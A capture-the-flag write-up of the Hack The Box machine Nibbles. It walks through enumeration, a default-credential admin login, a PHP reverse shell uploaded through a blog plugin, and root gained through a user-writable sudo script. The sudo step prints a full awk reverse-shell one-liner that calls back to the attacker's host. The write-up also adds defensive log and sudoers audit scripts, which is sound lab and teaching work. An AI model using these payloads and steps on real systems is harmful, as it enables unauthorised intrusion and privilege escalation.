My first step was to run Nmap against the machine to identify running services.
# Nmap 7.80 scan initiated Mon Nov 2 13:11:02 2020 as: nmap -p- -sV -sC -O -oN scan 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.022s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/2%OT=22%CT=1%CU=32093%PV=Y%DS=2%DC=I%G=Y%TM=5FA04C1
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=103%GCD=1%ISR=10F%TI=Z%CI=I%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 2 13:12:43 2020 -- 1 IP address (1 host up) scanned in 100.56 seconds
As you can see, both SSH (22) and HTTP (80) were open. I decided to first browse to port 80, where I was greeted with a page containing the text “Hello World!”. Viewing the page source showed there was a hidden comment:
<b>Hello world!</b> <!-- /nibbleblog/ directory. Nothing interesting here! -->
I browsed to the nibbleblog directory and was greeted with the following:
I then ran DIRB against the webserver to find hidden directories.
kali@kali:~$ dirb http://10.10.10.75/nibbleblog /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Nov 2 13:17:36 2020
URL_BASE: http://10.10.10.75/nibbleblog/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://10.10.10.75/nibbleblog/ ----
+ http://10.10.10.75/nibbleblog/README (CODE:200|SIZE:4628)
==> DIRECTORY: http://10.10.10.75/nibbleblog/admin/
==> DIRECTORY: http://10.10.10.75/nibbleblog/content/
==> DIRECTORY: http://10.10.10.75/nibbleblog/languages/
==> DIRECTORY: http://10.10.10.75/nibbleblog/plugins/
==> DIRECTORY: http://10.10.10.75/nibbleblog/themes/

---- Entering directory: http://10.10.10.75/nibbleblog/admin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.75/nibbleblog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.75/nibbleblog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.75/nibbleblog/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.75/nibbleblog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Nov 2 13:24:51 2020
DOWNLOADED: 20458 - FOUND: 1
From the output you can see that multiple directories were found, and that several of them had directory listing enabled. The one I found of interest was the admin directory. Browsing to it displayed an admin login page. From here I was able to log in using common credentials found via Google (admin:nibbles).
I then discovered the following website, which describes the process of uploading a reverse shell via the image upload plugin. I modified Kali’s default PHP reverse shell from “/usr/share/webshells/php/php-reverse-shell.php” with my VPN tunnel IP address and port 2600. I then browsed to Plugins, then to the “My Image” plugin configuration page, and uploaded the shell using the form on that page.
The uploaded shell is stored at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
I started a netcat listener on port 2600 and browsed to that page to execute the reverse shell.
root@kali:/home/kali/Documents/nibbles# nc -nvlp 2600
listening on [any] 2600 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.75] 56942
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 14:43:24 up 6 min,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ cd home
$ ls
nibbler
$ cd nibbler
$ ls
personal.zip
user.txt
$ cat user.txt
[REDACTED]
$
As you can see from the output, the reverse shell worked and I was able to capture the user flag.
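Seen from the defender's side, the upload above leaves two traces: a request to a .php file under the writable content/private/ tree in the Apache access log, and the script itself on disk. The following POSIX shell script is an added example, not code from the original writeup; it checks both. The access-log lines are constructed to mirror the writeup (client 10.10.14.24 and the image.php path mentioned above) and assume Apache's combined log format; the on-disk check builds a throwaway content tree rather than touching a real web root.

```shell
#!/bin/sh
# Added example, not part of the original writeup: two defender-side checks for
# scripts planted through a plugin upload form. The log lines are constructed
# to mirror the writeup, not captured from a real server.

SAMPLE_ACCESS_LOG='10.10.14.24 - - [02/Nov/2020:14:40:01 +0000] "GET /nibbleblog/admin/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.24 - - [02/Nov/2020:14:43:20 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.9 - - [02/Nov/2020:14:43:21 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.jpg?x=1 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
10.10.14.9 - - [02/Nov/2020:14:44:00 +0000] "GET /nibbleblog/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

# Log-side check: print "client path" for every request whose path resolves to
# a PHP-family script under content/private/, the writable upload area.
# Assumes Apache combined log format (the request line is the first
# double-quoted field).
php_under_uploads() {
  awk '{
    n = split($0, q, "\"")       # q[2] = "METHOD PATH PROTO"
    if (n < 2) next
    split(q[2], r, " ")
    path = r[2]
    sub(/\?.*/, "", path)        # drop the query string before matching
    if (path ~ /\/content\/private\/.*\.(php|phtml|phar)$/) print $1, path
  }'
}

# Filesystem-side check: list script files that ended up under a content tree
# (on the box that would be the nibbleblog/content directory under the web root).
php_files_under() {
  find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' \) | sort
}

demo() {
  echo "== requests that executed a script from the upload area =="
  printf '%s\n' "$SAMPLE_ACCESS_LOG" | php_under_uploads

  # Build a throwaway content tree that looks like the post-upload state.
  root=$(mktemp -d)
  mkdir -p "$root/content/private/plugins/my_image"
  : > "$root/content/private/plugins/my_image/image.php"
  : > "$root/content/private/plugins/my_image/image.jpg"
  echo "== script files found under $root/content =="
  php_files_under "$root/content"
  rm -rf "$root"
}
demo
```

The log check flags only the request that actually executes the planted file; the earlier hit on the admin directory and the image.jpg request are ignored, which keeps the rule quiet on normal blog traffic. The durable fix is to stop the web server from executing scripts under the upload tree at all, so that a planted image.php is served as text rather than run.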
The next step was to escalate privileges to become root. This ended up being very simple. I ran the command sudo -l to see which commands can be run under sudo:
sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
You can see from the output that /home/nibbler/personal/stuff/monitor.sh can be run using sudo without a password. Because that path sits under nibbler's own home directory, nibbler can create it and control its contents. I created the /home/nibbler/personal/stuff/ directory and then a monitor.sh file with the following contents:
#!/bin/bash
awk 'BEGIN {s = "/inet/tcp/0/10.10.14.23/2667"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
This creates a reverse shell to my Kali machine on port 2667. I started a netcat listener on that port and then ran monitor.sh under sudo:
cd /home/nibbler/personal/stuff
ls
monitor.sh
sudo ./monitor.sh
root@kali:/home/kali/Documents/nibbles# nc -nvlp 2667
listening on [any] 2667 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.75] 39924
shell>shell>whoami
root
shell>cat /root/root.txt
[REDACTED]
shell>
As you can see in the output, the reverse shell connected back and I was able to capture the root flag.
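The root cause here is a sudoers rule whose target the low-privileged user can create or overwrite, and it is easy to audit for. The POSIX shell script below is an added example, not part of the original writeup: it parses `sudo -l` output (the sample is the output quoted above), and for each NOPASSWD target walks up to the first path component that actually exists and checks whether that component is owned by the invoking user or is world-writable. That catches the exact situation on this box, where personal/stuff/ did not exist yet but the home directory above it belonged to nibbler. It assumes GNU stat (-c) with a BSD stat (-f) fallback; the demo rebuilds the layout in a temporary directory owned by whoever runs it, since /home/nibbler will not exist on your machine.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit `sudo -l` output for
# NOPASSWD targets the invoking user could replace. A target counts as unsafe
# when it, or the first ancestor that actually exists, is owned by that user
# or is world-writable. Assumes GNU stat (-c) or BSD stat (-f).

# Constructed sample: the `sudo -l` output quoted in the writeup.
SAMPLE_SUDO_L='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# Print one NOPASSWD command path per line from `sudo -l` output on stdin
# (arguments after the path are dropped; comma-separated lists are split).
nopasswd_targets() {
  sed -n 's/.*NOPASSWD:[[:space:]]*//p' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//; s/[[:space:]].*$//' \
    | grep '^/' || true
}

# Walk up from a path until a component that exists is found. If the user
# owns that component they can create everything below it.
first_existing() {
  p=$1
  while [ ! -e "$p" ] && [ "$p" != "/" ]; do
    p=$(dirname "$p")
  done
  printf '%s\n' "$p"
}

# "owner octal-mode" of a path, following symlinks.
owner_and_mode() {
  stat -L -c '%U %a' "$1" 2>/dev/null || stat -L -f '%Su %Lp' "$1"
}

# Classify a sudo target for a given user: prints "unsafe" or "safe".
sudo_target_risk() {
  target=$1
  user=$2
  anc=$(first_existing "$target")
  set -- $(owner_and_mode "$anc")
  owner=$1
  other=$(printf '%s' "$2" | tail -c 1)   # last octal digit = "other" bits
  case "$other" in 2|3|6|7) world_writable=1 ;; *) world_writable=0 ;; esac
  if [ "$owner" = "$user" ] || [ "$world_writable" = 1 ]; then
    echo unsafe
  else
    echo safe
  fi
}

# Demo: rebuild the writeup's layout in a temp home owned by the current user,
# so the missing personal/stuff/ chain is judged the way it would be on the box.
demo() {
  me=$(id -un)
  home=$(mktemp -d)
  for t in $(printf '%s\n' "$SAMPLE_SUDO_L" | nopasswd_targets); do
    rebased="$home${t#/home/nibbler}"
    printf '%s -> %s (first existing ancestor %s, owner %s)\n' \
      "$t" "$(sudo_target_risk "$rebased" "$me")" "$(first_existing "$rebased")" "$me"
  done
  printf '/bin/sh -> %s for user nibbler\n' "$(sudo_target_risk /bin/sh nibbler)"
  rm -rf "$home"
}
demo
```

Run it as the user whose sudo rights you are reviewing, or feed it a saved `sudo -l` transcript; any "unsafe" line means the rule grants root to whoever can write the target, not to the script the administrator had in mind. The fix is to keep sudo targets in root-owned directories such as /usr/local/sbin with mode 755 or tighter, never under a user's home.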